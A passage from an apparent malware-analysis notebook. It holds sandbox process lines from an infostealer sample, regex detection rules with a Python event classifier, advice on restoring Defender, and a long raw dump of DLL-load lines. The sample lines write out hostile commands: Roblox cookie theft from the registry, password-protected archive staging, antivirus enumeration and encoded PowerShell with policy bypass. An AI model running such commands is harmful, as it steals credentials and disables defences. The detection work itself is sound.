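    r'Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.cmdline"',
    r'Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe a -r -hp"yeezy222" "C:\Users\user\AppData\Local\Temp\vLqBW.zip" *',
    r'Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY',
    r'Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName',
    r'Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe"',
    r'Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand <payload omitted>',
    r'Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F',
    r'Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown',
]

# "\s*" before "Process created:" tolerates the fused form; the child path is the
# shortest prefix ending in .exe/.com, so paths with spaces (Program Files) still split.
LINE_RE = re.compile(r'^Source:\s*(?P<parent>.+?)\s*Process created:\s*(?P<rest>.+)$')
CHILD_RE = re.compile(r'^(?P<child>.+?\.(?:exe|com))(?:\s+(?P<cmdline>.*))?$', re.IGNORECASE)

# Command-line rules keyed to behaviours the report flags. Rule names are mine.
RULES = [(name, re.compile(pat, re.IGNORECASE)) for name, pat in [
    ("defender_protection_disabled", r"Set-MpPreference\b.*-Disable\w*\s+\$true"),
    ("defender_exclusion_added", r"Add-MpPreference\b.*-ExclusionPath"),
    ("defender_definitions_removed", r"MpCmdRun\.exe.*-RemoveDefinitions"),
    ("hosts_file_attrib_toggle", r"\battrib\s+[+-]r\s+.*\\drivers\\etc\\hosts"),
    ("wifi_profile_enumeration", r"\bnetsh\s+wlan\s+show\s+profile"),
    ("clipboard_capture", r"\bGet-Clipboard\b"),
    ("encoded_or_bypass_powershell", r"-EncodedCommand\b|-ExecutionPolicy\s+Bypass"),
    ("av_product_enumeration", r"SecurityCenter2.*AntivirusProduct"),
    ("roblox_cookie_theft", r"\.ROBLOSECURITY\b"),
    ("password_protected_archive_staging", r"\brar\.exe\s+a\b.*\s-hp"),
    ("hidden_system_file_attrib", r"\battrib\s+\+h\s+\+s\b"),
]]

DEFENDER_TAMPER = {"defender_protection_disabled", "defender_exclusion_added",
                   "defender_definitions_removed"}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_line(line):
    """Split one report line into parent image, child image and child command line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    parent, rest = m.group("parent"), m.group("rest")
    c = CHILD_RE.match(rest)
    if c:
        child, cmdline = c.group("child"), c.group("cmdline") or ""
    else:  # e.g. "unknown unknown" when the sandbox could not resolve the child
        child, cmdline = rest.split(" ", 1)[0], ""
    return {"parent": parent, "child": child, "cmdline": cmdline}


def classify(event):
    """Return the rule names an event triggers, including the parent/child chain rule."""
    hits = [name for name, rx in RULES if rx.search(event["cmdline"])]
    # Add-Type style inline compilation: csc.exe spawned directly by powershell.exe.
    if basename(event["child"]) == "csc.exe" and basename(event["parent"]) == "powershell.exe":
        hits.append("powershell_inline_compile")
    return hits


def analyze(lines):
    events = []
    for line in lines:
        ev = parse_line(line)
        if ev:
            ev["hits"] = classify(ev)
            events.append(ev)
    return events


def summarize(events):
    return Counter(h for ev in events for h in ev["hits"])


def defender_tampering(events):
    """Subset of the three Defender-tampering rules seen. All three together is the
    disable / exclude / strip-definitions sequence this sample runs."""
    return DEFENDER_TAMPER & set(summarize(events))


if __name__ == "__main__":
    evs = analyze(SAMPLE_LINES)
    for ev in evs:
        print(f"{basename(ev['parent'])} -> {basename(ev['child'])}: {', '.join(ev['hits']) or '-'}")
    print("defender tampering:", sorted(defender_tampering(evs)))
```

On a live host the same rules apply to Sysmon Event ID 1 or Security 4688 records (ParentImage, Image, CommandLine) rather than report text. When all three Defender rules fire for one parent, as they do here for D1UL0FG.exe, treat the endpoint's Defender state as untrusted: Get-MpPreference will show the ExclusionPath entries and Disable* flags the sample set, Remove-MpPreference -ExclusionPath clears the exclusions, and MpCmdRun.exe -SignatureUpdate restores the definitions that -RemoveDefinitions -All deleted.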
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: vcruntime140.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: python3.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: libffi-7.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: sqlite3.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: libcrypto-1_1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: libssl-1_1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: avicap32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: msvfw32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: dciman32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: winmmbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: mmdevapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: ksuser.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: avrt.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: audioses.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: powrprof.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: umpdc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: msacm32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: midimap.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                                Source: C:\Windows\System32\attrib.exe | Section loaded: ulib.dll
                                Source: C:\Windows\System32\attrib.exe | Section loaded: fsutilext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: version.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: mpr.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: framedynos.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: dbghelp.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: srvcli.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: netutils.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: wbemcomn.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: winsta.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: amsi.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: userenv.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: profapi.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: version.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: mpr.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: framedynos.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: dbghelp.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: srvcli.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: netutils.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: wbemcomn.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: winsta.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: amsi.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: userenv.dll
                                Source: C:\Windows\System32\tasklist.exe | Section loaded: profapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe | Section loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe | Section loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe | Section loaded: cryptsp.dll
                                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
                                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
                                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
                                Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
